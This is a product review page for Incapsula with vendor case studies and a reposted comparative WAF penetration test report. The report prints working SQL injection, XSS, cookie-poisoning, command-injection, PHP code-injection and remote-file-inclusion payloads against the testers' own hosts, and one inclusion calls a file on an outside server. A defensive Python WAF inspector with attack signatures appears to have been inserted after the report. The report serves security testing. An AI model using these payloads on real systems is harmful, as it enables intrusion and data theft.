Engineer with 51-200 employees
Using Incapsula’s DDoS Protection and Load Balancing we maximized our Website Security and Availability
To support the growing traffic to our website from online traders, we realized that strong protection from DDoS and other types of attacks was only part of the equation. To ensure high availability (99.999% uptime) and consistent performance for our users, we also needed the ability to efficiently distribute website traffic across multiple servers.
As our online business grew, it became clear to us that we needed an enterprise-grade service that was able to combine powerful DDoS mitigation together with advanced load-balancing capabilities that would enable us to cost-effectively scale beyond the capacity of a single web server, as well as supporting automatic failover to prevent downtime.
Our previous cloud-based DDoS mitigation service supported load balancing via DNS, which by definition is TTL-reliant. This means that in the event of an overloaded server, for example, it may take several minutes before traffic is re-routed to another server. In the meantime, users continue to be routed to the overloaded server, further adding to the load and increasing latency. Another disadvantage of this load balancing method is that TTL may vary for different geographies and ISPs.
In the extremely time-sensitive world of online trading, it is mandatory that all traders have access to the same information at the same time. DNS-based load balancing was not suitable for our business model and impaired the user experience.
With these requirements in mind, we started our search for an alternative solution and came across some reviews of Incapsula in online industry forums.
Following an evaluation of Incapsula against our previous solution, we decided to purchase Incapsula’s comprehensive Enterprise plan, including “always on” DDoS Protection, an enterprise-grade WAF, Load Balancing and a global CDN. Incapsula was initially onboarded for a single server. We added a second server one week later for purposes of Load Balancing and Failover.
The key factors in our choice of Incapsula were that we were particularly impressed with its enterprise-grade WAF, powerful non-intrusive DDoS protection and efficient load balancing capabilities. From a management point of view, Incapsula’s real-time statistics, easy setup procedures and detailed control panel also represented a significant improvement over our previous solution.
We use Incapsula's service to secure our online trading platform against any type of DDoS attack (Layers 3, 4 & 7) with virtually zero business disruption. All incoming traffic to our online trading application is filtered by Incapsula, which automatically detects and blocks DDOS attacks and other types of malicious traffic. In addition, Incapsula’s sophisticated and scalable load balancing solution supports several different traffic distribution methods with built-in monitoring and failover capabilities to ensure high availability.
By using Incapsula's service, we have achieved several concrete benefits:
- Layer 7 load balancing – Tracks HTTP requests as they are being processed by the origin servers, intelligently distributes the traffic in accordance with actual server loads, and reacts quickly to lags even before the server becomes unresponsive
- Cloud-based mitigation of network DDoS attacks - Mitigates high-volume network attacks through a global network of multi-gigabyte scrubbing centers
- Intelligent mitigation of sophisticated application layer attacks - Uses advanced traffic analysis algorithms, granular mitigation rules and an enterprise-grade WAF to differentiate legitimate website visitors (humans, search engines, etc.) from automated or malicious clients.
- Real-time statistics - Provides a complete, real time view of incoming traffic, security events and server load distribution, allowing rapid response to security events and supporting real-time data driven decisions.
Incapsula has proven to be a very effective solution for meeting our rigorous security and load balancing requirements. Real-time statistics rock – it’s like having your own NOC at the click of a button, and helps us to better manage our website with 360-degree visibility of all events.
Disclosure: PeerSpot has made contact with the reviewer to validate that the person is a real user. The information in the posting is based upon a vendor-supplied case study, but the reviewer has confirmed the content's accuracy.
CEO with 51-200 employees
Incapsula helped us stay up during some of the biggest DDoS attacks on record
To ensure the success of our online trading operations, we place a major emphasis on state-of-the-art security, high availability (99.9% uptime) and user convenience.
Daily high-volume network DDoS attacks against our website were wreaking havoc with business operations, resulting in downtime for our online trading platform. The anti-DDoS solutions we had in place were not equipped to mitigate these attacks, which came precisely at the time when we were experiencing record trading volumes.
Since our company deals with a highly competitive and time-sensitive trading market, high availability and stability are paramount to building our users' confidence in our platform. It was obvious to us that in order to maintain and grow our business, we needed the best DDoS protection solution.
We required a high-capacity solution capable of mitigating the largest Layer 3 DDoS attacks, which can often reach several tens of Gbps. Blackholing was not a desirable option, since this aggressive method for diverting traffic actually serves the attackers' goal of denying and disrupting service by not allowing any visitors to reach the site.
To ensure an optimal user experience, we sought a DDoS mitigation solution that would be transparent to users. In this context, we preferred a solution that does not use delay pages, which cause problems for the application's APIs and prevent users from connecting to the server.
In terms of architecture, we preferred a cloud-based solution for reasons of cost-effectiveness and compatibility with our existing cloud computing infrastructure.
Aware of the threat to our core business, we immediately began to look for a new anti-DDoS solution with the network capacity and security proficiency to meet our requirements. After an in-depth evaluation of leading DDoS Protection services in several industry comparisons and reviews, we chose Incapsula's cloud-based DDoS Protection service based on its ability to mitigate any type of DDoS attack with virtually zero business disruption.
We conducted an initial trial with Incapsula while still experiencing DDoS attacks of up to 100 Gbps. Incapsula mitigated these attacks, keeping the online trading platforms up at all times.
Our experience so far shows that Incapsula is a marked improvement over other DDoS protection companies we have worked with in the past. Despite the fact that attacks on our high-profile website are still a daily occurrence, traders coming to the site are able to buy and sell without any noticeable degradation in terms of performance and availability.
Through its non-intrusive traffic filtering and an enterprise-grade Web Application Firewall, Incapsula has been stable in protecting our online applications. The service secures websites and applications against all types of DDoS attacks, as well as sophisticated application attacks such as XSS and SQL injections.
Incapsula is now a key component of our security infrastructure. When under DDoS, traffic is routed through Incapsula for screening, where malicious traffic and DDOS attacks are blocked automatically.
By using Incapsula's DDoS Protection, we have achieved concrete benefits:
- Cloud-based mitigation of network DDoS attacks - Incapsula mitigates high-volume network attacks through a global network of multi-gigabyte scrubbing centers
- Intelligent mitigation of sophisticated application layer attacks - Incapsula uses advanced traffic analysis algorithms, granular mitigation rules and an enterprise-grade WAF to differentiate legitimate website visitors (humans, search engines, etc.) from automated or malicious clients.
- "Always on" DDoS protection - Automatic "always on" DDoS mitigation and 24x7 monitoring are effective in stopping "hit & run" DDoS attacks, which can wreak havoc with solutions that need to be manually turned on and off on every burst.
- Dedicated SOC team – An experienced team of Security Operations Center (SOC) engineers performs 24x7 security monitoring and assists with DDoS mitigation as needed.
Incapsula helped us stay up during some of the biggest DDoS attacks on record. This happened at a critical business juncture, when our increasing trading volumes were turning us into the number one bitcoin trading site in the world. We hope to continue working with Incapsula as we gain more exposure and popularity.
Disclosure: PeerSpot has made contact with the reviewer to validate that the person is a real user. The information in the posting is based upon a vendor-supplied case study, but the reviewer has confirmed the content's accuracy.
Infrastructure Expert at a tech services company with 1,001-5,000 employees
Great service, great value
Valuable Features:
Their solutions are always on, in depth and protect against most all web threats imaginable.
Improvements to My Organization:
Essentially, it has added an extra layer of protection to my clients through their DNS routing service. Less downtime, and happier clients.
Disclosure: My company does not have a business relationship with this vendor other than being a customer.
I have seen that the IP reputation feature works well in identifying spam and ham. How do you fix it if a ham threat is caught as spam? Do you have an end user quarantine feature or does it need to be released by an administrator every time?
Security Expert with 51-200 employees
CloudFlare vs Incapsula: Web Application Firewall
CloudFlare vs Incapsula: Round 2
Web Application Firewall
Comparative Penetration Testing Analysis Report v1.0
Summary
This document contains the results of a second comparative penetration test conducted by a team of security specialists at Zero Science Lab against two cloud-based Web Application Firewall (WAF) solutions: Incapsula and Cloudflare. This test was designed to bypass security controls in place, in any possible way, circumventing whatever filters they have. Given the rise in application-level attacks, the goal of the test was to provide IT managers of online businesses with a comparison of these WAFs against real-world threats in simulated real-world conditions.
Zero Science Lab is a Macedonian Information Security Research and Development Laboratory that specializes in information security hardening, consulting, network security, vulnerability research, software and hardware security assessment, penetration testing, malware analysis, forensics and much more - https://www.zeroscience.mk
Background
In February 2013, we conducted the first comparative pentest analysis of the CloudFlare, Incapsula and ModSecurity Web Application Firewall (WAF) solutions. The goal of a WAF is to block hacker attacks / unwanted malicious traffic to your web application with as few false positives as possible.
Since then, all three vendors have replied to the findings, applying patches to the discovered bypasses and improving their products to protect their customers from web attacks. In August 2013, CloudFlare even launched a new rule-based WAF to augment their existing heuristics-based WAF (which we used in the first pentest). Since Incapsula also uses a rule-based approach, we decided that now is a good time to run a follow-up pentest comparison, this time focusing only on CloudFlare's new WAF and Incapsula's WAF. Over the past 8 months, both vendors have improved their firewall solutions by adding extra features and upgrading the rulesets and signature detection algorithms.
The difference between this report and the previous one is that now we have focused more on real-world web application exploitation applying known encoding techniques, as well as the rate of false positives.
Results
1. Attack Vector coverage
The table below shows the overall statistics of the exploits testing:
2. WAF evasion techniques
A black-box penetration test was conducted against the two services (using their respective Business Plans), applying known filter evasion techniques to bypass their web application firewall solutions using real-world scenarios and a variety of attack vectors.
We wanted to check how the WAFs deal with evasion techniques, and we took common vectors for each rule and obfuscated them using different evasion techniques like:
- Multi-parameter vectors
- Microsoft Unicode encoding
- Invalid characters
- SQL comments
- Redundant white space
- HTML encoding for XSS
- Javascript escaping for XSS
- Hex encoding for XSS
- Character encoding for Directory Traversal
3. Known Vulnerabilities Handling
Each of the exploits was executed with its default payload. After that, we applied the evasion techniques to the same payloads and marked the results. Below is a table that gives you an overview of which vulnerability was blocked and which vulnerability bypassed the WAF mechanisms for detecting known web application exploits.
Results (overview of real apps exploit bypass list):
4. False Positives
Obviously a key evaluation criterion for a WAF is to be able to block as many attack variants as possible. However, in real life scenarios there is another evaluation criterion that is just as important – not blocking legitimate users.
Testing for false positives is not a trivial task and the way we have decided to run this test is to simulate an administrator that is updating the application HTML. You would find this action in any CMS and it is specifically prone to false positives in XSS filters that look for suspicious HTML and Javascript code.
From our tests it seems that Incapsula has a mechanism to detect what CMS is installed on the web server and to automatically detect and whitelist legitimate administrative actions.
On the other hand CloudFlare’s aggressive XSS filter blocked legitimate attempts to upload HTML and Javascript code to the application through the CMS built in functions.
Conclusion
From the results table, we can see that Incapsula's WAF continues to have an advantage over CloudFlare's WAF. We should also mention that only Incapsula's WAF is PCI-Certified, which is an advantage for certain types of online businesses.
While CloudFlare's new WAF solution showed substantial improvement since the first penetration test, it still does not provide the comprehensive level of security against certain types of web application attacks (e.g., SQL injection, Remote File Inclusion) that many online businesses today require.
We noticed the high block ratio of XSS attacks, but of all the types of attacks, the main focus was on Cross-Site Scripting. The SQL Injection, Local and Remote File Inclusion, and Remote Code/Command Execution attacks had a very low detection rate by the CloudFlare WAF.
Incapsula, on the other hand, has shown consistent security performance in both tests, with a high block ratio and few false-positives.
Intro
Both Incapsula and CloudFlare WAF services have improved their protection mechanisms and detection methodologies since the previous evaluation. That being said, we decided to put them on yet another heavy test and see what filters we can evade/bypass. All the settings were set to maximum level of protection in both testing environments.
This time we used several real-world applications vulnerable to different types of attack vectors to simulate a real hacking scenario against the firewall services of both vendors.
Along with the vulnerable applications, we used an improved PoC script file to test the solutions against generic attack vectors and their learning mechanisms. This script was written by us; it basically takes unsanitized input from users, which allowed us to exploit it and manipulate the results in several ways that would confirm 100% whether or not the filter was indeed working as expected.
Setup and configuration
We're not going into details on how to set up the CloudFlare and Incapsula services. Refer to the previous report for more details. All we can say here is that the infrastructure design has remained the same, which is the WAF sitting in front of the dedicated server, intercepting all requests that are destined for it. The setup process from the client's perspective has stayed the same as well. We've set everything to 'ON' and 'HIGH' for both WAF options.
CloudFlare WAF Settings
Incapsula WAF Settings
Targets and tools
For this occasion we've created two separate testbeds on separate server host machines.
- CloudFlare - cf.destr0y.net
- Incapsula - in.zeroscience.mk, inc.zeroscience.mk, inc.destr0y.net, 4sylum.elgringodelanoche.com
The testbed servers were running Apache web server with PHP and MySQL DBMS. Both the servers had the 'poc.php' script deployed, which is vulnerable to Cross-Site Scripting, SQL Injection, Local and Remote File Inclusion, Cookie Poisoning and Command Execution attacks. We also installed several real-world web applications that are vulnerable to different attack vectors.
Practico CMS 13.7 Auth Bypass SQL Injection - by shiZheni (https://www.exploit-db.com/exploits/28129)
Practico CMS contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the index.php script not properly sanitizing user-supplied input to the 'uid' parameter. This may allow an attacker to inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data.
WP NOSpamPTI Plugin Blind SQL Injection - by Alexandro Silva (https://www.exploit-db.com/exploits/28485)
NOSpamPTI contains a flaw that may allow an attacker to carry out a Blind SQL injection attack. The issue is due to the wp-comments-post.php script not properly sanitizing the comment_post_ID in POST data. This may allow an attacker to inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data.
WP TimThumb Plugin Remote Code Execution - by Mark Maunder (https://www.exploit-db.com/exploits/17602)
TimThumb is prone to a Remote Code Execution vulnerability, because the script does not check remotely cached files properly. By crafting a special image file with a valid MIME-type, and appending a PHP file at the end of this, it is possible to fool TimThumb into believing that it is a legitimate image, thus caching it locally in the cache directory.
WP W3 Total Cache Plugin PHP Code Execution - by Unknown (https://osvdb.org/show/osvdb/92652)
W3 Total Cache Plugin for WordPress contains a flaw that is due to the program failing to properly restrict access to the mclude and mfunc PHP code inclusion macros. This may allow a remote attacker to insert and execute arbitrary PHP code.
webgrind 1.0 Local File Inclusion Vulnerability - by Michael Meyer (https://www.exploit-db.com/exploits/18523)
webgrind suffers from a file inclusion vulnerability (LFI) when input passed through the 'file' parameter to index.php is not properly verified before being used to include files. This can be exploited to include files from local resources with directory traversal attacks and URL encoded NULL bytes.
Newsletter Tailor 0.2.0 Remote File Inclusion - by Snakespc (https://www.exploit-db.com/exploits/11378)
Newsletter Tailor contains a flaw that may allow a remote attacker to execute arbitrary commands or code. The issue is due to the index.php script not properly sanitizing user input supplied to the 'p' parameter. This may allow an attacker to include a file from a third-party remote host that contains commands or code that will be executed by the vulnerable script with the same privileges as the web server.
Apache Struts <2.2.0 Command Execution - by Meder Kydyraliev (https://www.exploit-db.com/exploits/14360)
Apache Struts versions < 2.2.0 suffer from a remote command execution vulnerability. This issue is caused by a failure to properly handle unicode characters in OGNL extensive expressions passed to the web server. By sending a specially crafted request to the Struts application it is possible to bypass the "#" restriction on ParameterInterceptors by using OGNL context variables. Bypassing this restriction allows for the execution of arbitrary Java code.
Apache Struts includeParams RCE < 2.3.14.2 - by Eric K., Douglas R. (https://www.osvdb.org/show/osvdb/93645)
Apache Struts contains a flaw that may allow an attacker to execute arbitrary commands. The issue is due to the handling of the includeParams attribute in the URL and Anchor tags. With a specially crafted request parameter, an attacker could inject arbitrary OGNL code that would be evaluated. In addition, a second evaluation of attacker supplied input can occur when the URL or Anchor tag tries to resolve arbitrary parameters, that would be evaluated as an OGNL expression.
Apache Struts < 2.2.3 Multiple RCE - by Takeshi Terada (https://www.securityfocus.com/bid/61189)
Apache Struts is prone to multiple remote command-execution vulnerabilities. Successful exploits will allow remote attackers to execute arbitrary commands within the context of the affected application.
GLPI < 0.84.1 Arbitrary PHP Code Injection - by High-Tech Bridge SA (https://www.exploit-db.com/exploits/28685)
GLPI suffers from an insufficient validation of user-supplied input passed to the "db_host", "db_user", "db_pass", and "databasename" HTTP POST parameters via "/install/install.php" script [that is present by default after application installation] before writing data into "/config_db.php" file. A remote attacker can inject and execute arbitrary PHP code on the vulnerable system.
Joomla CMS 3.1.5, WordPress 3.6.1 and phpMyAdmin 4.0.8 - False Positives Front
99% of the testing was done manually, but we used several tools for fuzzing and automation to see how the WAFs would behave with scanners and session tracking.
Tools used:
- Acunetix Web Vulnerability Scanner
- Havij SQL Injection Tool
- Burp Suite
- OWASP Zed Attack Proxy (ZAP)
- TamperData
- Firebug
- Cookies Manager+
- CookieMonster
- HttpFox
- Live HTTP Headers
- tcpdump
- Wireshark
- Metasploit Framework
We used the following browsers:
- Mozilla Firefox
- Microsoft Internet Explorer
- Google Chrome
- Opera
- Apple Safari
- Iceweasel
Contents of poc.php:
Testing and analysis
Since the previous report, Incapsula has patched the bypasses, improved their WAF and even included a new separate control for RFI attacks.
CloudFlare, having in mind our previous results, has introduced a much improved WAF based on the OWASP Core Rule Set (ModSecurity). However, there are lots of bypasses present in the newly upgraded WAF solution. We noticed only a few false positives in CloudFlare while doing regular tasks, using a legitimate application from a regular user's perspective. Given the fact that the False Positives test was executed using phpMyAdmin, this was more than expected.
Incapsula, on the other hand, also had a few false positives, including simple Joomla administrator actions. Unlike CloudFlare, Incapsula offers a great option for whitelisting the request URL and the affected parameter, which allows the WAF administrator to resolve incidents of this kind at any time.
What’s also important to note is that Incapsula can recognize an ongoing attack and block the attacker's session. We specifically noticed this during the test using automated tools such as ZAP and Burp. Their blocking mechanism seems to be based on recognizing the fingerprint of the tool being used, so even if you try to trick it by changing the default User-Agent or manipulating other header fields, the WAF will still block your session. We didn't notice such a mechanism in CloudFlare's WAF. CloudFlare blocks a session only if an attacker tries to manipulate and send invalid headers.
XSS vectors:
- Vectors making use of HTML5 features
- Vectors working on HTML4 and older versions
- Cascading stylesheet injection based vectors
- Plain JavaScript vectors
- E4X vectors working on gecko based browsers
- Vectors attacking DOM properties and methods
- JSON based vectors
- Vectors embedded in SVG files
- Vectors related to X(HT)ML
- UTF7 and other exotic charset based vectors
- Client side denial of service vectors
- HTML behavior and binding vectors
- Clickjacking and UI Redressing vectors
Results (CloudFlare):
Webgrind Local File Inclusion Bypass:
https://cf.destr0y.net/webgrind/index.php?file=/etc...
GLPI SQL Injection and Remote Code Execution Bypass:
<form action="https://cf.destr0y.net/glpi/install/install.php" method="post" name="main">
<input type="hidden" name="install" value="update_1">
<input type="hidden" name="db_host" value="'; } passthru($_GET['cmd']); /*">
<input type="submit" id="btn">
</form>
https://cf.destr0y.net/glpi/index.php?cmd=ls%20-la;...
Newsletter Tailor Remote File Inclusion Bypass:
https://cf.destr0y.net/list/admin/index.php?p=http:...
https://cf.destr0y.net/list/admin/index.php?p=http:...
Practico SQL Injection Authentication Bypass:
POST /practico/ HTTP/1.1
Host: cf.destr0y.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 73
Connection: keep-alive
Accept-Encoding: gzip, deflate
accion=Iniciar_login&uid=admin%27+AND+1%3D1%23&clave=password&captcha=vhw3
TimThumb Remote File Include Bypass:
https://cf.destr0y.net/wp/wp-content/plugins/timthumb/cache/external_3ad96be987d746db968ebaa77c49900e.php
WP Plugin NoSpamPTI Blind SQL Injection Bypass:
<form novalidate="" id="commentform" method="post" action="https://cf.destr0y.net/wp/wp-comments-post.php">
<input type="submit" value="Post Comment" id="submit" name="submit">
<input type="hidden" id="comment_post_ID" value="1 AND SLEEP(15)" name="comment_post_ID"><br>
<input type="hidden" value="0" id="comment_parent" name="comment_parent">
</form>
Cookie Poisoning Bypass (XSS, SQLi, RFI, LFI, CMDexec):
CloudFlare doesn't check the Cookie value or any other HTTP header field (except User-Agent) for malicious strings. To prove this, we successfully managed to exploit the cookie vulnerabilities in the PoC script.
Cookie XSS Bypass:
Cookie value:
hallo=J0xy0L </h2><script>alert(document.cookie)</script>
Cookie CMDExec Bypass:
Cookie value: market=uname -a;
Cookie LFI/RFI Bypass:
Cookie value: segment=https://zeroscience.mk/pentest/tim.php
Cookie SQLi Bypass:
Cookie value: notifications=dasdsa' union select* from testwaf;#
Directory Traversal Bypass using Burp:
Apache Struts Block (msf):
SQL Injection Fuzz (ZAP) Block:
WP W3 Total Cache Plugin PHP Code Execution Block:
<textarea aria-required="true" rows="8" cols="45" name="comment" id="comment"><!--mfunc eval(base64_decode(cGhwaW5mbygpOyAg)); --><!--/mfunc--></textarea>
User-Agent HTTP Header Field XSS Block:
UA value: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0"><script>alert(1);</script>
False Positive (phpMyAdmin):
https://cf.destr0y.net/phpma/querywindow.php?token=... &table=testwaf&sql_query=SELECT%20*%20FROM%20%60testwaf%60%20WHERE%20%60testzsl%60%3D1&init=1 (?)
Unlike Incapsula, CloudFlare does not offer an option to whitelist requests and parameters, but rather whitelists the IP of the user.
Results (Incapsula):
Webgrind Local File Inclusion Bypass:
It seems it's configured to detect and trigger on hardcoded values (i.e. /etc/hosts, /etc/passwd). The vulnerability can still be used to read other valuable files on the system. For example:
https://in.zeroscience.mk/webgrind/index.php?op=fil...
GLPI SQL Injection and Remote Code Execution Bypass:
<form action="https://inc.destr0y.net/glpi/install/install.php" method="post" name="main">
<input type="hidden" name="install" value="update_1">
<input type="hidden" name="db_host" value="'; } passthru($_GET['cmd']); /*">
<input type="submit" id="btn">
</form>
GLPI SQL Injection and Remote Code Execution Bypass:
POST /practico/ HTTP/1.1
Host: 4sylum.elgringodelanoche.com
Content-Type: application/x-www-form-urlencoded
accion=Iniciar_login&uid=admin' AND 230984752 = 230984752#&clave=admin&captcha=rxbg
Accept-Encoding HTTP Header Field XSS Bypass:
AE value: gzip, deflate"><script>alert(1);</script>
User-Agent HTTP Header Field XSS Bypass:
UA value: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0"><script>alert(document.cookie)</script>
Remote File Include Bypass (questionable (captcha)):
Apache Struts Block (tcpdump):
Cross-Site Scripting Bypass:
https://inc.zeroscience.mk/poc.php?x=%3Cform%20id=t... %3Cbutton%20form=test%20onformchange=alert(/XSS/)%3EX%3C/button%3E
XSS Fuzz (Burp) Block:
WP Plugin NoSpamPTI Blind SQL Injection Block:
<form novalidate="" id="commentform" method="post" action="https://in.zeroscience.mk/wp/wp-comments-post.php">
<input type="submit" value="Post Comment" id="submit" name="submit">
<input type="hidden" id="comment_post_ID" value="1 AND SLEEP(15)" name="comment_post_ID">
<input type="hidden" value="0" id="comment_parent" name="comment_parent">
</form>
Newsletter Tailor Remote File Inclusion Block:
https://in.zeroscience.mk/list/admin/index.php?p=ht...
TimThumb Remote File Include Block:
https://in.zeroscience.mk/wp/wp-content/plugins/timthumb/timthumb.php?src=https://zeroscience.mk/pentest/tim.php.php
WP W3 Total Cache Plugin PHP Code Execution Block:
<textarea aria-required="true" rows="8" cols="45" name="comment" id="comment"><!--mfunc eval(base64_decode(cGhwaW5mbygpOyAg)); --><!--/mfunc--></textarea>
False Positive (Joomla):
Due to suspicious values being hardcoded as event triggers, Incapsula blocks legitimate access to applications with those keywords in the content/payload.
For example, any comments in blogs or web content containing any of these keywords will cause Incapsula to deny access. As an example, any IT helpdesk blog with content containing strings such as /etc/passwd or /etc/hosts.
Access denied was presented to us when saving the global configuration in Joomla CMS because of the POST parameter 'jform[sendmail]' with value /usr/sbin/sendmail. Also, when we tried to install any extension we got blocked, but we can add the parameter and the request URL to the whitelist, excluding this particular false positive.
POST https://in.zeroscience.mk/joomla/administrator/ind... HTTP/1.1 - jform[sendmail]=/usr/sbin/sendmail
POST https://in.zeroscience.mk/joomla/administrator/ind... - joomla extension install (RFI FP)
Afterthoughts
We can conclude and confirm that both solutions have improved over the course of this year. And that’s really good to see. Incapsula has invested more into blocking real life attacks on real apps. Their session blocking works pretty well against automated attacks, but it didn’t block our sessions while doing the manual testing. They might want to put some more effort into that.
CloudFlare has made a big step forward by introducing a new WAF solution, knowing that in the previous result they were rock bottom and basically didn’t stop any attacks. Their new solution is fine, but they still have lots of work to do to bring it up to Incapsula's level.
We also noticed that CloudFlare has a higher protection rate for XSS attacks than for SQLi and LFI/RFI combined.
As we’ve shown in the Results part, both Incapsula and CloudFlare don’t block malicious requests with values sent in HTTP headers. This leaves an open door for attackers to exploit vulnerabilities of such kind. We specifically tested this with Cookie XSS, LFI, RFI and CMD Execution vulnerabilities in the PoC script. Here is a list of a few public cookie poisoning vulnerabilities to show the real life relevance of this issue:
- ClanSphere 2011.3 Local File Inclusion - https://www.exploit-db.com/exploits/22181
- Aleza Portal v1.6 Insecure (SQLi) Cookie Handling - https://www.exploit-db.com/exploits/15144
- Seo Panel 2.2.0 Cookie-Rendered Persistent XSS Vulnerability - https://www.exploit-db.com/exploits/15144
- AV Arcade v3 Cookie SQL Injection Authentication Bypass - https://www.exploit-db.com/exploits/15144
- Website Baker Version <2.6.5 SQL Injection - https://www.exploit-db.com/exploits/15144
- SetSeed CMS 5.8.20 (loggedInUser) SQL Injection - https://www.exploit-db.com/exploits/15144
For References and Appendix see: https://zeroscience.mk/files/wafreport2013v2.pdf
Disclosure: My company does not have a business relationship with this vendor other than being a customer.
For domain verification, CloudFlare has an upper hand on Incapsula.
CloudFlare works in close collaboration with major web hosting companies around the world, so the verification in CloudFlare is easier and speedy.
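Two defensive points in the report above are worth seeing in code: signature rules that only look at the URL and body miss attack values carried in headers such as Cookie, and keyword signatures like /etc/passwd or /usr/sbin/sendmail need narrowly scoped exceptions (method, path, parameter, rule) rather than a disabled rule when they hit legitimate admin traffic. The following is an added example written for this page, not code from the report or from either vendor; the signatures, the request samples, the example.test host and the /administrator/index.php path and jform[sendmail] parameter modelled on the Joomla false positive are all constructed for illustration.

```python
"""Minimal WAF-style request inspector (added illustration, not vendor code).

Shows two things from the WAF comparison above:
  1. Inspecting only the query string and body misses payloads in the
     Cookie header; the same rules must run over header values too.
  2. A keyword signature that blocks a legitimate admin request is fixed
     with an exemption scoped to one method/path/parameter/rule, so the
     rule keeps firing everywhere else.
All signatures, paths and requests below are constructed sample data.
"""
import re
from dataclasses import dataclass, field
from urllib.parse import parse_qsl, urlsplit

# Toy signatures for illustration only; real rulesets are far richer.
SIGNATURES = {
    "LFI": re.compile(r"(?:\.\./){2,}|/etc/(?:passwd|hosts|shadow)\b", re.I),
    "RFI": re.compile(r"^\s*(?:https?|ftp)://", re.I),
    "XSS": re.compile(r"<\s*script\b|on(?:error|load)\s*=", re.I),
    "CMD": re.compile(r"/usr/s?bin/\w+|[;|&`]\s*(?:cat|id|ls|wget|curl)\b", re.I),
    "SQLi": re.compile(r"'\s*or\s+'?\d+'?\s*=\s*'?\d+|union\s+select", re.I),
}


@dataclass
class Request:
    method: str
    url: str
    headers: dict = field(default_factory=dict)
    body: str = ""


@dataclass(frozen=True)
class Exemption:
    """A false-positive exception scoped as narrowly as possible."""
    method: str
    path: str        # exact request path the exemption applies to
    location: str    # "query", "body", "cookie" or "header"
    param: str       # parameter, cookie or header name
    signature: str   # the one rule that is suppressed

    def matches(self, method, path, location, param, signature):
        return (self.method == method and self.path == path
                and self.location == location and self.param == param
                and self.signature == signature)


def _fields(req):
    """Yield (location, name, value) for every inspectable request field."""
    parts = urlsplit(req.url)
    for k, v in parse_qsl(parts.query, keep_blank_values=True):
        yield ("query", k, v)
    ctype = req.headers.get("Content-Type", "")
    if req.body and "application/x-www-form-urlencoded" in ctype:
        for k, v in parse_qsl(req.body, keep_blank_values=True):
            yield ("body", k, v)
    elif req.body:
        yield ("body", "<raw>", req.body)
    for name, value in req.headers.items():
        if name.lower() == "cookie":
            # Split the Cookie header into individual cookies so that each
            # value is matched on its own, exactly like a query parameter.
            for cookie in value.split(";"):
                ck, _, cv = cookie.strip().partition("=")
                yield ("cookie", ck, cv)
        else:
            yield ("header", name, value)


def inspect(req, exemptions=(), inspect_headers=True):
    """Return [(signature, location, field)] for matches not covered by an exemption.

    inspect_headers=False reproduces the gap described in the report: rules
    run only over the URL and body, so cookie-borne payloads pass through.
    """
    path = urlsplit(req.url).path
    hits = []
    for loc, name, value in _fields(req):
        if loc in ("header", "cookie") and not inspect_headers:
            continue
        for sig, pattern in SIGNATURES.items():
            if not pattern.search(value):
                continue
            if any(e.matches(req.method, path, loc, name, sig) for e in exemptions):
                continue
            hits.append((sig, loc, name))
    return hits


# Constructed sample traffic (hostnames, paths and values are made up).
REQ_LFI_QUERY = Request("GET", "https://example.test/list/admin/index.php?p=../../../../etc/passwd")
REQ_COOKIE_LFI = Request("GET", "https://example.test/list/admin/index.php?p=home",
                         {"Cookie": "lang=../../../../etc/passwd; sid=abc123",
                          "User-Agent": "Mozilla/5.0"})
REQ_JOOMLA = Request("POST", "https://example.test/administrator/index.php",
                     {"Content-Type": "application/x-www-form-urlencoded",
                      "Cookie": "session=deadbeef"},
                     "jform[sitename]=Shop&jform[sendmail]=/usr/sbin/sendmail")
# Exemption for the Joomla global-configuration save only: same value on any
# other path, parameter or method is still blocked.
JOOMLA_EXEMPTION = Exemption("POST", "/administrator/index.php", "body", "jform[sendmail]", "CMD")

if __name__ == "__main__":
    print("query LFI          :", inspect(REQ_LFI_QUERY))
    print("cookie LFI, no hdr :", inspect(REQ_COOKIE_LFI, inspect_headers=False))
    print("cookie LFI, hdr on :", inspect(REQ_COOKIE_LFI))
    print("joomla save, no ex :", inspect(REQ_JOOMLA))
    print("joomla save, exempt:", inspect(REQ_JOOMLA, exemptions=[JOOMLA_EXEMPTION]))
```

The design point is the shape of the exemption: it names the method, the exact path, the location, the parameter and the single rule being suppressed, so a legitimate `/usr/sbin/sendmail` value in the Joomla configuration form is allowed while the same string in a query string, a cookie or another endpoint still triggers the CMD rule.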
CEO at a tech services company with 51-200 employees
We use Incapsula for some of our sites and the experience has been excellent
We use Incapsula for some of our sites and the experience has been excellent. You would not even know it was there – unlike those caching plugins (admittedly they are for speed not for security) – which remind you constantly that they are there so much so that you have to turn them off. Whoops.
Disclosure: My company does not have a business relationship with this vendor other than being a customer.
I developed a website and it has SSL. Do you know if Incapsula can support it?
Developer with 51-200 employees
We Use Incapsula's DDoS Protection Service to Maximize Availability and Performance
In September 2013, our online store was the victim of a prolonged three-week application-level DDoS attack. Mitigating this type of Layer 7 DDoS attack is a major challenge for security solutions, since malicious bot traffic often appears to be requests from legitimate users. During this attack, our existing anti-DDoS solution was not able to effectively filter out the malicious traffic, which meant that innocent e-commerce customers were blocked from accessing the sites or were forced to unnecessarily fill out CAPTCHA challenges.
As an e-commerce company, website security is central to our core business. We needed a DDoS protection solution that would enable us to maintain "business as usual" even under attack, with minimum disruption to the user experience. Minimizing false positives was a crucial requirement, since the easiest way to lose a customer is to block her from accessing the site.
Realizing that our previous solution was not equipped to handle this type of sophisticated application-level DDoS attack, we sought a DDoS Protection service capable of correctly filtering all types of DDoS attacks from legitimate website traffic, without affecting the online experience for our customers.
During our search for a new solution, we came across Incapsula and were impressed by industry comparisons such as the one appearing on TopTenReviews.com showing the clear superiority of Incapsula over our existing service in terms of professionalism, performance and security.
We decided to give Incapsula a try and initially activated their service on our French domain. It quickly became clear to us that Incapsula was the right solution to handle the DDoS attacks that we face. After only six days, we signed a contract and moved our other domains to Incapsula's service as well.
We are now using Incapsula's always-on DDoS Protection service to secure our online stores against the largest and smartest types of DDoS attacks - including network, protocol and application level (Layers 3, 4 & 7) attacks – with minimal business disruption.
Incapsula is now a key component of our security infrastructure. When under DDoS, traffic is routed through Incapsula for screening, where malicious traffic and DDOS attacks are blocked automatically.
By using Incapsula's DDoS Protection, we have achieved concrete benefits:
